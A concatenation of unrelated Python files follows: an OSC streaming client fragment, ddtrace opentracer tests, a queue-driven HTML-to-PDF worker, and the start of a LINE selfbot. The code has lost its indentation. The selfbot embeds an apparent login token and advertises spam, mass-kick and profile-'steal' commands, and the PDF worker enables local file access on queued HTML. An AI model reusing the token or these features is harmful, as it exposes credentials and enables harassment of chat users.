self.receiving_thread = threading.Thread(target=self._receiving_thread_entry)
self.receiving_thread.start()
def close(self):
# let socket time out
self._running = False
self.receiving_thread.join()
self.socket.close()
def _transmitWithTimeout(self, data):
sent = 0
while sent < len(data):
try:
tmp = self.socket.send(data[sent:])
except socket.timeout:
if not self._running:
print "CLIENT: Socket timed out and termination requested."
return False
else:
continue
except socket.error, e:
if e[0] == errno.ECONNRESET:
print "CLIENT: Connection reset by peer."
return False
else:
raise e
if tmp == 0:
return False
sent += tmp
return True
def _transmitMsgWithTimeout(self, msg):
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
binary = msg.getBinary()
length = len(binary)
# prepend length of packet before the actual message (big endian)
len_big_endian = array.array('c', '\0' * 4)
struct.pack_into(">L", len_big_endian, 0, length)
len_big_endian = len_big_endian.tostring()
if self._transmitWithTimeout(len_big_endian) and self._transmitWithTimeout(binary):
return True
else:
return False
def sendOSC(self, msg):
"""Send an OSC message or bundle to the server. Returns True on success.
"""
self._txMutex.acquire()
txOk = self._transmitMsgWithTimeout(msg)
self._txMutex.release()
return txOk
def __str__(self):
"""Returns a string containing this Client's Class-name, software-version
and the remote-address it is connected to (if any)
"""
out = self.__class__.__name__
out += " v%s.%s-%s" % version
addr = self.socket.getpeername()
if addr:
out += " connected to osc://%s" % getUrlStr(addr)
else:
out += " (unconnected)"
return out
def __eq__(self, other):
"""Compare function.
"""
if not isinstance(other, self.__class__):
return False
# cmp() returns 0 for equal objects, so convert it to a boolean equality test
isequal = (cmp(self.socket._sock, other.socket._sock) == 0)
if isequal and getattr(self, 'server', None) and getattr(other, 'server', None):
return cmp(self.server, other.server) == 0
return isequal
def __ne__(self, other):
"""Compare function.
"""
return not self.__eq__(other)
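# ----------------------------------------------------------------------------
# Editor's note -- illustrative sketch, not part of the original module.
# The OSCStreamingClient docstring above explains that replies arrive on a
# secondary thread and are matched against the client's own address space.
# A minimal usage sketch; the '/ping' and '/pong' addresses mirror the
# hypothetical server sketch further above, and addMsgHandler() is assumed
# from OSCAddressSpace.
def _example_streaming_client(server_host='127.0.0.1', server_port=9900):
    def pong_handler(addr, tags, data, client_address):
        # runs on the client's receiving thread
        print "CLIENT: got reply", addr, data
    client = OSCStreamingClient()
    client.addMsgHandler("/pong", pong_handler)
    client.connect((server_host, server_port))
    msg = OSCMessage("/ping")
    msg.append(1)
    client.sendOSC(msg)
    time.sleep(1.0)   # give the receiving thread a moment to handle the reply
    client.close()
# ----------------------------------------------------------------------------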
# vim:noexpandtab
|
test_tracer.py
|
import time
import opentracing
from opentracing import (
child_of,
Format,
InvalidCarrierException,
UnsupportedFormatException,
SpanContextCorruptedException,
)
import ddtrace
from ddtrace.ext.priority import AUTO_KEEP
from ddtrace.opentracer import Tracer, set_global_tracer
from ddtrace.opentracer.span_context import SpanContext
from ddtrace.propagation.http import HTTP_HEADER_TRACE_ID
from ddtrace.settings import ConfigException
import mock
import pytest
class TestTracerConfig(object):
def test_config(self):
"""Test the configuration of the tracer"""
config = {'enabled': True}
tracer = Tracer(service_name='myservice', config=config)
assert tracer._service_name == 'myservice'
assert tracer._enabled is True
def test_no_service_name(self):
"""A service_name should be generated if one is not provided."""
tracer = Tracer()
assert tracer._service_name == 'pytest'
def test_multiple_tracer_configs(self):
"""Ensure that a tracer config is a copy of the passed config."""
config = {'enabled': True}
tracer1 = Tracer(service_name='serv1', config=config)
assert tracer1._service_name == 'serv1'
config['enabled'] = False
tracer2 = Tracer(service_name='serv2', config=config)
# Ensure tracer1's config was not mutated
assert tracer1._service_name == 'serv1'
assert tracer1._enabled is True
assert tracer2._service_name == 'serv2'
assert tracer2._enabled is False
def test_invalid_config_key(self):
"""A config with an invalid key should raise a ConfigException."""
config = {'enabeld': False}
# Without the debug flag, this should not raise an error
tracer = Tracer(service_name='mysvc', config=config)
# With debug flag should raise an error
config['debug'] = True
with pytest.raises(ConfigException) as ce_info:
tracer = Tracer(config=config)
assert 'enabeld' in str(ce_info)
assert tracer is not None
# Test with multiple incorrect keys
config['setttings'] = {}
with pytest.raises(ConfigException) as ce_info:
tracer = Tracer(service_name='mysvc', config=config)
assert 'enabeld' in str(ce_info) and 'setttings' in str(ce_info)
assert tracer is not None
def test_global_tags(self):
"""Global tags should be passed from the opentracer to the tracer."""
config = {
'global_tags': {
'tag1': 'value1',
'tag2': 2,
},
}
tracer = Tracer(service_name='mysvc', config=config)
with tracer.start_span('myop') as span:
# global tags should be attached to all generated datadog spans
assert span._dd_span.get_tag('tag1') == 'value1'
assert span._dd_span.get_tag('tag2') == '2'
with tracer.start_span('myop2') as span2:
assert span2._dd_span.get_tag('tag1') == 'value1'
assert span2._dd_span.get_tag('tag2') == '2'
class TestTracer(object):
def test_start_span(self, ot_tracer, writer):
"""Start and finish a span."""
with ot_tracer.start_span('myop') as span:
pass
# span should be finished when the context manager exits
assert span.finished
spans = writer.pop()
assert len(spans) == 1
def test_start_span_references(self, ot_tracer, writer):
"""Start a span using references."""
with ot_tracer.start_span('one', references=[child_of()]):
pass
spans = writer.pop()
assert spans[0].parent_id is None
root = ot_tracer.start_active_span('root')
# create a child using a parent reference that is not the context parent
with ot_tracer.start_active_span('one'):
with ot_tracer.start_active_span('two', references=[child_of(root.span)]):
pass
root.close()
spans = writer.pop()
assert spans[2].parent_id is spans[0].span_id
def test_start_span_custom_start_time(self, ot_tracer):
"""Start a span with a custom start time."""
t = 100
with mock.patch('ddtrace.span.time_ns') as time:
time.return_value = 102 * 1e9
with ot_tracer.start_span('myop', start_time=t) as span:
pass
assert span._dd_span.start == t
assert span._dd_span.duration == 2
def test_start_span_with_spancontext(self, ot_tracer, writer):
"""Start and finish a span using a span context as the child_of
reference.
"""
with ot_tracer.start_span('myop') as span:
with ot_tracer.start_span('myop', child_of=span.context) as span2:
pass
# span should be finished when the context manager exits
assert span.finished
assert span2.finished
spans = writer.pop()
assert len(spans) == 2
# ensure proper parenting
assert spans[1].parent_id is spans[0].span_id
def test_start_span_with_tags(self, ot_tracer):
"""Create a span with initial tags."""
tags = {'key': 'value', 'key2': 'value2'}
with ot_tracer.start_span('myop', tags=tags) as span:
pass
assert span._dd_span.get_tag('key') == 'value'
assert span._dd_span.get_tag('key2') == 'value2'
def test_start_span_with_resource_name_tag(self, ot_tracer):
"""Create a span with the tag to set the resource name"""
tags = {'resource.name': 'value', 'key2': 'value2'}
with ot_tracer.start_span('myop', tags=tags) as span:
pass
# Span resource name should be set to tag value, and should not get set as
# a tag on the underlying span.
assert span._dd_span.resource == 'value'
assert span._dd_span.get_tag('resource.name') is None
# Other tags are set as normal
assert span._dd_span.get_tag('key2') == 'value2'
def test_start_active_span_multi_child(self, ot_tracer, writer):
"""Start and finish multiple child spans.
This should ensure that child spans can be created 2 levels deep.
"""
with ot_tracer.start_active_span('myfirstop') as scope1:
time.sleep(0.009)
with ot_tracer.start_active_span('mysecondop') as scope2:
time.sleep(0.007)
with ot_tracer.start_active_span('mythirdop') as scope3:
time.sleep(0.005)
# spans should be finished when the context manager exits
assert scope1.span.finished
assert scope2.span.finished
assert scope3.span.finished
spans = writer.pop()
# check spans are captured in the trace
assert scope1.span._dd_span is spans[0]
assert scope2.span._dd_span is spans[1]
assert scope3.span._dd_span is spans[2]
# ensure proper parenting
assert spans[1].parent_id is spans[0].span_id
assert spans[2].parent_id is spans[1].span_id
# sanity check a lower bound on the durations
assert spans[0].duration >= 0.009 + 0.007 + 0.005
assert spans[1].duration >= 0.007 + 0.005
assert spans[2].duration >= 0.005
def test_start_active_span_multi_child_siblings(self, ot_tracer, writer):
"""Start and finish multiple span at the same level.
This should test to ensure a parent can have multiple child spans at the
same level.
"""
with ot_tracer.start_active_span('myfirstop') as scope1:
time.sleep(0.009)
with ot_tracer.start_active_span('mysecondop') as scope2:
time.sleep(0.007)
with ot_tracer.start_active_span('mythirdop') as scope3:
time.sleep(0.005)
# spans should be finished when the context manager exits
assert scope1.span.finished
assert scope2.span.finished
assert scope3.span.finished
spans = writer.pop()
# check spans are captured in the trace
assert scope1.span._dd_span is spans[0]
assert scope2.span._dd_span is spans[1]
assert scope3.span._dd_span is spans[2]
# ensure proper parenting
assert spans[1].parent_id is spans[0].span_id
assert spans[2].parent_id is spans[0].span_id
# sanity check a lower bound on the durations
assert spans[0].duration >= 0.009 + 0.007 + 0.005
assert spans[1].duration >= 0.007
assert spans[2].duration >= 0.005
def test_start_span_manual_child_of(self, ot_tracer, writer):
"""Start spans without using a scope manager.
Spans should be created without parents since there will be no call
for the active span.
"""
root = ot_tracer.start_span('zero')
with ot_tracer.start_span('one', child_of=root):
with ot_tracer.start_span('two', child_of=root):
with ot_tracer.start_span('three', child_of=root):
pass
root.finish()
spans = writer.pop()
assert spans[0].parent_id is None
# ensure each child span is a child of root
assert spans[1].parent_id is root._dd_span.span_id
assert spans[2].parent_id is root._dd_span.span_id
assert spans[3].parent_id is root._dd_span.span_id
assert (
spans[0].trace_id == spans[1].trace_id
and spans[1].trace_id == spans[2].trace_id
)
def test_start_span_no_active_span(self, ot_tracer, writer):
"""Start spans without using a scope manager.
Spans should be created without parents since there will be no call
for the active span.
"""
with ot_tracer.start_span('one', ignore_active_span=True):
with ot_tracer.start_span('two', ignore_active_span=True):
pass
with ot_tracer.start_span('three', ignore_active_span=True):
pass
spans = writer.pop()
# ensure each span does not have a parent
assert spans[0].parent_id is None
assert spans[1].parent_id is None
assert spans[2].parent_id is None
# and that each span is a new trace
assert (
spans[0].trace_id != spans[1].trace_id
and spans[1].trace_id != spans[2].trace_id
and spans[0].trace_id != spans[2].trace_id
)
def test_start_active_span_child_finish_after_parent(self, ot_tracer, writer):
"""Start a child span and finish it after its parent."""
span1 = ot_tracer.start_active_span('one').span
span2 = ot_tracer.start_active_span('two').span
span1.finish()
time.sleep(0.005)
span2.finish()
spans = writer.pop()
assert len(spans) == 2
assert spans[0].parent_id is None
assert spans[1].parent_id is span1._dd_span.span_id
assert spans[1].duration > spans[0].duration
def test_start_span_multi_intertwined(self, ot_tracer, writer):
"""Start multiple spans at the top level intertwined.
Alternate calling between two traces.
"""
import threading
# synchronize threads with a threading event object
event = threading.Event()
def trace_one():
id = 11
with ot_tracer.start_active_span(str(id)):
id += 1
with ot_tracer.start_active_span(str(id)):
id += 1
with ot_tracer.start_active_span(str(id)):
event.set()
def trace_two():
id = 21
event.wait()
with ot_tracer.start_active_span(str(id)):
id += 1
with ot_tracer.start_active_span(str(id)):
id += 1
with ot_tracer.start_active_span(str(id)):
pass
# the ordering should be
# t1.span1/t2.span1, t2.span2, t1.span2, t1.span3, t2.span3
t1 = threading.Thread(target=trace_one)
t2 = threading.Thread(target=trace_two)
t1.start()
t2.start()
# wait for threads to finish
t1.join()
t2.join()
spans = writer.pop()
# trace_one will finish before trace_two so its spans should be written
# before the spans from trace_two, let's confirm this
assert spans[0].name == '11'
assert spans[1].name == '12'
assert spans[2].name == '13'
assert spans[3].name == '21'
assert spans[4].name == '22'
assert spans[5].name == '23'
# next let's ensure that each span has the correct parent:
# trace_one
assert spans[0].parent_id is None
assert spans[1].parent_id is spans[0].span_id
assert spans[2].parent_id is spans[1].span_id
# trace_two
assert spans[3].parent_id is None
assert spans[4].parent_id is spans[3].span_id
assert spans[5].parent_id is spans[3].span_id
# finally we should ensure that the trace_ids are reasonable
# trace_one
assert (
spans[0].trace_id == spans[1].trace_id
and spans[1].trace_id == spans[2].trace_id
)
# traces should be independent
assert spans[2].trace_id != spans[3].trace_id
# trace_two
assert (
spans[3].trace_id == spans[4].trace_id
and spans[4].trace_id == spans[5].trace_id
)
def test_start_active_span(self, ot_tracer, writer):
with ot_tracer.start_active_span('one') as scope:
pass
assert scope.span._dd_span.name == 'one'
assert scope.span.finished
spans = writer.pop()
assert spans
def test_start_active_span_finish_on_close(self, ot_tracer, writer):
with ot_tracer.start_active_span('one', finish_on_close=False) as scope:
pass
assert scope.span._dd_span.name == 'one'
assert not scope.span.finished
spans = writer.pop()
assert not spans
def test_start_active_span_nested(self, ot_tracer):
"""Test the active span of multiple nested calls of start_active_span."""
with ot_tracer.start_active_span('one') as outer_scope:
assert ot_tracer.active_span == outer_scope.span
with ot_tracer.start_active_span('two') as inner_scope:
assert ot_tracer.active_span == inner_scope.span
with ot_tracer.start_active_span(
'three'
) as innest_scope: # why isn't it innest? innermost so verbose
assert ot_tracer.active_span == innest_scope.span
with ot_tracer.start_active_span('two') as inner_scope:
assert ot_tracer.active_span == inner_scope.span
assert ot_tracer.active_span == outer_scope.span
assert ot_tracer.active_span is None
def test_start_active_span_trace(self, ot_tracer, writer):
"""Test the active span of multiple nested calls of start_active_span."""
with ot_tracer.start_active_span('one') as outer_scope:
outer_scope.span.set_tag('outer', 2)
with ot_tracer.start_active_span('two') as inner_scope:
inner_scope.span.set_tag('inner', 3)
with ot_tracer.start_active_span('two') as inner_scope:
inner_scope.span.set_tag('inner', 3)
with ot_tracer.start_active_span('three') as innest_scope:
innest_scope.span.set_tag('innerest', 4)
spans = writer.pop()
assert spans[0].parent_id is None
assert spans[1].parent_id is spans[0].span_id
assert spans[2].parent_id is spans[0].span_id
assert spans[3].parent_id is spans[2].span_id
@pytest.fixture
def nop_span_ctx():
return SpanContext(sampling_priority=AUTO_KEEP)
class TestTracerSpanContextPropagation(object):
"""Test the injection and extration of a span context from a tracer."""
def test_invalid_format(self, ot_tracer, nop_span_ctx):
"""An invalid format should raise an UnsupportedFormatException."""
# test inject
with pytest.raises(UnsupportedFormatException):
ot_tracer.inject(nop_span_ctx, None, {})
# test extract
with pytest.raises(UnsupportedFormatException):
ot_tracer.extract(None, {})
def test_inject_invalid_carrier(self, ot_tracer, nop_span_ctx):
"""Only dicts should be supported as a carrier."""
with pytest.raises(InvalidCarrierException):
ot_tracer.inject(nop_span_ctx, Format.HTTP_HEADERS, None)
def test_extract_invalid_carrier(self, ot_tracer):
"""Only dicts should be supported as a carrier."""
with pytest.raises(InvalidCarrierException):
ot_tracer.extract(Format.HTTP_HEADERS, None)
def test_http_headers_base(self, ot_tracer):
"""extract should undo inject for http headers."""
span_ctx = SpanContext(trace_id=123, span_id=456)
carrier = {}
ot_tracer.inject(span_ctx, Format.HTTP_HEADERS, carrier)
assert len(carrier.keys()) > 0
ext_span_ctx = ot_tracer.extract(Format.HTTP_HEADERS, carrier)
assert ext_span_ctx._dd_context.trace_id == 123
assert ext_span_ctx._dd_context.span_id == 456
def test_http_headers_baggage(self, ot_tracer):
"""extract should undo inject for http headers."""
span_ctx = SpanContext(
trace_id=123, span_id=456, baggage={'test': 4, 'test2': 'string'}
)
carrier = {}
ot_tracer.inject(span_ctx, Format.HTTP_HEADERS, carrier)
assert len(carrier.keys()) > 0
ext_span_ctx = ot_tracer.extract(Format.HTTP_HEADERS, carrier)
assert ext_span_ctx._dd_context.trace_id == 123
assert ext_span_ctx._dd_context.span_id == 456
assert ext_span_ctx.baggage == span_ctx.baggage
def test_empty_propagated_context(self, ot_tracer):
"""An empty propagated context should raise a
SpanContextCorruptedException when extracted.
"""
carrier = {}
with pytest.raises(SpanContextCorruptedException):
ot_tracer.extract(Format.HTTP_HEADERS, carrier)
def test_text(self, ot_tracer):
"""extract should undo inject for http headers"""
span_ctx = SpanContext(
trace_id=123, span_id=456, baggage={'test': 4, 'test2': 'string'}
)
carrier = {}
ot_tracer.inject(span_ctx, Format.TEXT_MAP, carrier)
assert len(carrier.keys()) > 0
ext_span_ctx = ot_tracer.extract(Format.TEXT_MAP, carrier)
assert ext_span_ctx._dd_context.trace_id == 123
assert ext_span_ctx._dd_context.span_id == 456
assert ext_span_ctx.baggage == span_ctx.baggage
def test_corrupted_propagated_context(self, ot_tracer):
"""Corrupted context should raise a SpanContextCorruptedException."""
span_ctx = SpanContext(
trace_id=123, span_id=456, baggage={'test': 4, 'test2': 'string'}
)
carrier = {}
ot_tracer.inject(span_ctx, Format.TEXT_MAP, carrier)
assert len(carrier.keys()) > 0
# manually corrupt the propagated trace id key in the carrier
del carrier[HTTP_HEADER_TRACE_ID]
corrupted_key = HTTP_HEADER_TRACE_ID[2:]
carrier[corrupted_key] = 123
with pytest.raises(SpanContextCorruptedException):
ot_tracer.extract(Format.TEXT_MAP, carrier)
def test_immutable_span_context(self, ot_tracer):
"""Span contexts should be immutable."""
with ot_tracer.start_span('root') as root:
ctx_before = root.context
root.set_baggage_item('test', 2)
assert ctx_before is not root.context
with ot_tracer.start_span('child') as level1:
with ot_tracer.start_span('child') as level2:
pass
assert root.context is not level1.context
assert level2.context is not level1.context
assert level2.context is not root.context
def test_inherited_baggage(self, ot_tracer):
"""Baggage should be inherited by child spans."""
with ot_tracer.start_active_span('root') as root:
# this should be passed down to the child
root.span.set_baggage_item('root', 1)
root.span.set_baggage_item('root2', 1)
with ot_tracer.start_active_span('child') as level1:
level1.span.set_baggage_item('level1', 1)
with ot_tracer.start_active_span('child') as level2:
level2.span.set_baggage_item('level2', 1)
# ensure immutability
assert level1.span.context is not root.span.context
assert level2.span.context is not level1.span.context
# level1 should have inherited the baggage of root
assert level1.span.get_baggage_item('root')
assert level1.span.get_baggage_item('root2')
# level2 should have inherited the baggage of both root and level1
assert level2.span.get_baggage_item('root')
assert level2.span.get_baggage_item('root2')
assert level2.span.get_baggage_item('level1')
assert level2.span.get_baggage_item('level2')
class TestTracerCompatibility(object):
"""Ensure that our opentracer produces results in the underlying datadog tracer."""
def test_required_dd_fields(self):
"""Ensure required fields needed for successful tracing are possessed
by the underlying datadog tracer.
"""
# a service name is required
tracer = Tracer('service')
with tracer.start_span('my_span') as span:
assert span._dd_span.service
def test_set_global_tracer():
"""Sanity check for set_global_tracer"""
my_tracer = Tracer('service')
set_global_tracer(my_tracer)
assert opentracing.tracer is my_tracer
assert ddtrace.tracer is my_tracer._dd_tracer
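# ----------------------------------------------------------------------------
# Editor's note -- illustrative sketch, not part of the original test module.
# It strings together the opentracer API exercised by the tests above: create
# a Tracer, install it globally, start nested active spans, and propagate the
# span context through HTTP headers. The service name, tag and carrier values
# are arbitrary examples, not fixtures from this suite.
def _example_opentracer_usage():
    tracer = Tracer(service_name='example-svc', config={'enabled': True})
    set_global_tracer(tracer)
    with tracer.start_active_span('parent') as parent_scope:
        parent_scope.span.set_tag('component', 'example')
        with tracer.start_active_span('child'):
            carrier = {}
            tracer.inject(tracer.active_span.context, Format.HTTP_HEADERS, carrier)
            # a downstream service would call extract() on the received headers
            extracted = tracer.extract(Format.HTTP_HEADERS, carrier)
            return extracted
# ----------------------------------------------------------------------------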
|
backend.py
|
#!/usr/bin/env python3
import pika
import sys, os
import time
import threading
import logging
import redis
import queue
import pdfkit
import time
time.sleep(20)
xrange=range
if sys.argv[1:]:
max_threads = int(sys.argv[1])
else:
max_threads = int(os.environ.get('MAX_THREADS'))
logfile = os.environ.get('LOGFILE')
rabbit_host = os.environ.get('RABBIT_HOST')
rabbit_queue = os.environ.get('RABBIT_QUEUE')
rabbit_user = os.environ.get('RABBIT_USER')
rabbit_password = os.environ.get('RABBIT_PASS')
redis_host = os.environ.get('REDIS_HOST')
redis_port = os.environ.get('REDIS_PORT')
redis_db = os.environ.get('REDIS_DB')
logging.basicConfig(level=logging.DEBUG,format='%(asctime)-15s - %(threadName)-10s - %(message)s',filename=logfile)
pdfkitoptions = {
'enable-local-file-access': None,
'javascript-delay': 200,
'wait-for-network-idle': None
}
time.sleep(15)
def render_pdf(msg_id):
output_file = '/tmp/' + msg_id + '.pdf'
input_file = '/tmp/' + msg_id + '.html'
logging.debug('loading html from redis')
redis_server = redis.Redis(redis_host, port=redis_port, db=redis_db)
redis_response = redis_server.get(msg_id)
logging.debug('html loaded')
m = open(input_file, "wb")
m.write(redis_response)
m.close()
logging.debug('html written')
start_time = time.time()
sys_output = pdfkit.from_file(input_file, output_file, options=pdfkitoptions)
finish_time = time.time()
input_size = str(os.path.getsize(input_file)/1024) #.decode('utf-8')
output_size = str(os.path.getsize(output_file)/1024) #.decode('utf-8')
dbg_mesg = '[R] Render [msg.id:' + msg_id + '] ' + '[rend.time:' + str(finish_time-start_time) + 'sec]' + '[in.fle:' + input_file + '(' + input_size + 'kb)]' + '[ou.fle:' + output_file + '(' + output_size + 'kb)]'
logging.debug(dbg_mesg)
n = open(output_file, "rb")
binary_data = n.read()
n.close()
logging.debug('pdf loaded')
msg_out = msg_id.split('_')
msg = 'R_' + msg_out[1]
redis_server.set(msg, binary_data)
logging.debug('pdf written')
redis_server.delete(msg_id)
logging.debug('db record removed: ' + msg_id)
os.remove(output_file)
logging.debug('tmp file removed: ' + output_file)
os.remove(input_file)
logging.debug('tmp file removed: ' + input_file)
logging.debug('render done')
if not sys_output:
return True, output_file
return False, sys_output
#logging.debug('backend node starting...')
print('backend node starting...')
TQ = queue.Queue()
#logging.debug('threads pool starting...')
print('threads pool starting...')
def catcher(q):
while True:
try:
print ("trying...")
print (q)
item = q.get()
print ("wut...")
except queue.Empty:
break
#logging.debug('render get task: ' + item.strip().decode('utf-8'))
print('render get task: ' + item.strip().decode('utf-8'))
render_pdf(item.strip().decode('utf-8'))
q.task_done()
for i in xrange(max_threads):
wrkr_T = threading.Thread(target = catcher, args=(TQ,))
print('thread created...')
wrkr_T.daemon = True
wrkr_T.start()
logging.debug('thread: ' + str(i) + ' started')
logging.debug('consumer started...')
credentials = pika.PlainCredentials(rabbit_user, rabbit_password)
try:
rabbit_server = pika.BlockingConnection(pika.ConnectionParameters(host=rabbit_host,credentials=credentials))
channel = rabbit_server.channel()
channel.queue_declare(queue=rabbit_queue)
def callback(ch, method, properties, body):
TQ.put(body)
logging.debug('consumer got task: ' + body.strip().decode('utf-8'))
channel.basic_consume(rabbit_queue, callback, auto_ack = True)
channel.start_consuming()
except KeyboardInterrupt:
logging.debug('backend daemon stopped')
print ("backend node stopped")
|
azmi.py
|
# -*- coding: utf-8 -*-
#baru
import LINETCR
from LINETCR.lib.curve.ttypes import *
from datetime import datetime
from PyDictionary import PyDictionary
from bs4 import BeautifulSoup
from mergedict import MergeDict
from mergedict import ConfigDict
from gtts import gTTS
from pyowm import OWM
from enum import Enum
#from django.http import HttpResponse
from flask import Flask, send_from_directory, redirect as redirect_flask, render_template
from random import randint
import time, random, sys, re, os, json
import subprocess, threading, string,codecs, requests, tweepy, ctypes, urllib, urllib2, wikipedia,cookielib,urllib3
import urllib3
import certifi
import ssl
import html5lib,shutil
import subprocess as cmd
import csv
import os
import errno
import imp
import StringIO
import traceback
import linecache
import stat
import cStringIO
import urlparse
import logging
import argparse
#import mimic
import xml
import base64
import ast
cl = LINETCR.LINE()
cl.login(token="EpZmr1vHTETBgTktOSFd.rLylacrPH39WJb0UIwB8Nq.iF+C5K0kG+xhIuIcc90vb1ER+7aCRdeMt1j/ocjPQSU=")
cl.loginResult()
print "Amii"
reload(sys)
sys.setdefaultencoding('utf-8')
helpMessage= """\n
▂▃▅▇█▓▒░۩H̸͟͞e̸͟͞l̸͟͞p̸͟͞ ̸͟͞۩░▒▓█▇▅▃▂
═╬════════►∆∆
E̸͟͞d̸͟͞i̸͟͞t̸͟͞e̸͟͞d̸͟͞.
═╬════════►
🔘 My name : |╬|
🔘 Bot2 rename: |╬|
🔘 Bot3 rename: |╬|
🔘 Bot4 rename: |╬|
🔘 Bot5 rename: |╬|
🔘 Bot6 rename: |╬|
🔘 All rename: |╬|
🔘 Allbio: |╬|
🔘 My clone @ |╬|
🔘 Bot2 clone @ |╬|
🔘 Bot3 clone @ |╬|
🔘 Bot4 clone @ |╬|
🔘 Bot5 clone @ |╬|
🔘 Bot6 clone @ |╬|
🔘 Comment: |╬|
🔘 Message: |╬|
🔘 Bot1-6 backup |╬|
🔘 Bot1-6 backup |╬|
🔘 Group name: |╬|
═╬════════►∆∆
🔓D̸͟͞e̸͟͞m̸͟͞o̸͟͞t̸͟͞e̸͟͞d̸͟͞.🔓
═╬════════►
|╬| Admin on @
|╬| Expel on @
|╬| Expelal
═╬════════►
📷S̸͟͞T̸͟͞E̸͟͞A̸͟͞L̸͟͞I̸͟͞N̸͟͞G̸͟͞📷
═╬════════►
|╬| Steal
|╬| Steal name @
|╬| Steal Bio @
|╬| Steal status @
|╬| Steal mid @
|╬| Steal contact @
|╬| Steal cover @
|╬| Steal pict @
|╬| Steal group pict
|╬| Midpict: [mid]
|╬| Pict group [name]
|╬| My pict
|╬| My cover
|╬| My name
|╬| My bio
|╬| Pap set:
|╬| Pap
|╬| Image [Text]
═╬════════►
🔐S̸͟͞E̸͟͞C̸͟͞U̸͟͞R̸͟͞Y̸͟͞I̸͟͞T̸͟͞Y̸͟͞🔐
═╬════════►
|╬| Protect:low
|╬| Protect:hight
═╬════════►
🚮L̸͟͞I̸͟͞S̸͟͞T̸͟͞ B̸͟͞A̸͟͞N̸͟͞N̸͟͞E̸͟͞D̸͟͞🚮
═╬════════►
|╬| Ban @
|╬| Unban @
|╬| Banned
|╬| Unbanned
|╬| Ban repeat @
|╬| Add friend @
|╬| Clear banlist
═╬════════►
📲i̲̅n̲̅v̲̅i̲̅t̲̅a̲̅t̲̅i̲̅o̲̅n̲̅📲
═╬════════►
|╬| Invite:[mid]
|╬| Invite user[contact]
|╬| Invite me
|╬| Team @join
═╬════════►
📴L̸͟͞E̸͟͞A̸͟͞V̸͟͞E̸͟͞ G̸͟͞R̸͟͞O̸͟͞U̸͟͞P̸͟͞📴
═╬════════►
|╬| Bot2 @bye
|╬| Bot3 @bye
|╬| Bot4 @bye
|╬| Bot5 @bye
|╬| Bot6 @bye
|╬| Team @bye
|╬| Center @bye
|╬| Bye allgroups[own]
═╬════════►
🔫A̸͟͞U̸͟͞T̸͟͞O̸͟͞ S̸͟͞E̸͟͞T̸͟͞ B̸͟͞O̸͟͞T̸͟͞🔫
═╬════════►
|╬| Auto reinvite:on/off
|╬| Auto join:on/off
|╬| Auto leave:on/off
|╬| Auto like:on/off
|╬| Like friend:on/off
|╬| Welcome message:on/off
|╬| Auto notice:on/off
|╬| Denyinvites on/off
|╬| Blockqr:on/off
|╬| Namelock:on/off
|╬| Auto add:on/off
|╬| Check message
|╬| Add message:
|╬| Comment:on/off
|╬| Add comment:
|╬| Check comment
|╬| Backup:on/off
|╬| Gcancel:
|╬| Update welcome:
|╬| Check welcome message
═╬════════►
🚮M̸͟͞O̸͟͞D̸͟͞E̸͟͞ C̸͟͞A̸͟͞N̸͟͞C̸͟͞E̸͟͞L̸͟͞🚮
═╬════════►
|╬| Rejectall
|╬| Clean invites
|╬| Clear invites
═╬════════►
S̸͟͞U̸͟͞R̸͟͞P̸͟͞R̸͟͞I̸͟͞S̸͟͞E̸͟͞ G̸͟͞I̸͟͞F̸͟͞T̸͟͞
═╬════════►
|╬| gift1-15
|╬| Spam gift
|╬| Gift @
═╬════════►
📲N̸͟͞O̸͟͞T̸͟͞I̸͟͞F̸͟͞I̸͟͞C̸͟͞A̸͟͞T̸͟͞I̸͟͞O̸͟͞N̸͟͞ 📲
═╬════════►
|╬| Group list
|╬| Banlist
|╬| Admin list
|╬| Settings
|╬| Ginfo
|╬| TL:[text]
|╬| Miclist
|╬| Micdel @
|╬| Micadd @
═╬════════►
🚮W̸͟͞T̸͟͞F̸͟͞ K̸͟͞I̸͟͞L̸͟͞L̸͟͞ Y̸͟͞O̸͟͞U̸͟͞🚮
═╬════════►
|╬| #Bubar
|╬| Vkick @
|╬| Nk [name]
|╬| Kick:[mid]
|╬| Purge
═╬════════►
💻S̸͟͞P̸͟͞A̸͟͞M͞ S̸͟͞E̸͟͞R̸͟͞V̸͟͞E̸͟͞R̸͟͞💻
═╬════════►
|╬| Spamg[on/off]
|╬| Spam add:
|╬| Spam change:
|╬| Spam start:[number]
|╬| Spam @
|╬| Say a̸͟͞a̸͟͞a̸͟͞
|╬| Me
|╬| Speed
|╬| Debug speed
|╬| My mid
|╬| Gcreator
|╬| Halo
|╬| Bot contact
|╬| Bot mid
|╬| Creator
|╬| System
|╬| Iconfig
|╬| Kernel
|╬| Cpu
|╬| Respon/sname
|╬| Help
|╬| Mc:[mid]
|╬| runtim
|╬| show offenders:on/off
═╬════════►
💻U̸͟͞T̸͟͞I̸͟͞L̸͟͞I̸͟͞T̸͟͞Y̸͟͞💻
═╬════════►
|╬| Lurking
|╬| Lurking result
|╬| Link open
|╬| Link close
|╬| Gurl
|╬| Remove chat
|╬| Bot restart
═╬════════►
💿S̸͟͞E̸͟͞A̸͟͞R̸͟͞C̸͟͞H̸͟͞ C̸͟͞H̸͟͞A̸͟͞T̸͟͞💿
═╬════════►
|╬| Lyric
|╬| Music
|╬| Wiki
|╬| Vidio
|╬| Youtube
|╬| Instagram
|╬| Translate-idn [text]
|╬| Translate-eng [text]
|╬| Translate-thai [text]
|╬| Translate-japan [text]
|╬| Translate-arab [text]
|╬| Translate-korea [text]
|╬| Translate-chin [text]
|╬| Vn-id [text]
|╬| Vn-en [text]
|╬| Vn-jp [text]
|╬| Kalender
|╬| Vn [Text]
|╬| Cek zodiak [Tggl-bulan-tahun]
|╬| Tag on/off
|╬| Emoji [expression]
|╬| Info @[name]
|╬| Ping
|╬| Time
|╬| apakah
|╬| kerang ajaib
|╬| Sticker [expression]
═╬════════►
📣B̸͟͞R̸͟͞O̸͟͞A̸͟͞D̸͟͞C̸͟͞A̸͟͞S̸͟͞T̸͟͞📣
═╬════════►
|╬| Pm cast
|╬| Broadcast
|╬| Spam @[name]
═╬════════►
💻P̸͟͞o̸͟͞w̸͟͞e̸͟͞r̸͟͞💻
═╬════════►
🔘Turn off bots🔘
●▬▬▬▬๑۩Special Thanks۩๑▬▬▬▬▬●
●▬▬▬▬๑۩A̴M̴I̴I̴ T̴E̴A̴M̴B̴O̴T̴۩๑▬▬▬▬▬●
"""
textspeech= """╔═════════════════
║ TEXT TO SPEECH
╠═════════════════
